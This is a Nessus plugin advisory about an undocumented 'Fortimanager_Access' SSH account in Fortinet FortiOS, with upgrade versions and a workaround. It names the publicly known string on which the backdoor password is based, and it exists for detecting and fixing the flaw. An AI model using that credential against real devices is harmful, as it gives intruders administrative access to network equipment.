Fortinet FortiOS SSH Undocumented Interactive Login Vulnerability
Critical Nessus Plugin ID 87896
SynopsisThe SSH server running on the remote host can be logged into using default SSH credentials.
DescriptionThe SSH server running on the remote host can be logged into using default SSH credentials. The 'Fortimanager_Access' account has a password based on the string 'FGTAbc11*xy+Qqz27' and a calculated hash that is publicly known. A remote attacker can exploit this to gain administrative access to the remote host.
SolutionUpgrade to Fortinet FortiOS 4.3.17 / 5.0.8 / 5.2.x / 5.4.x or later.
Alternatively, as a workaround, disable administrative access via SSH on all interfaces.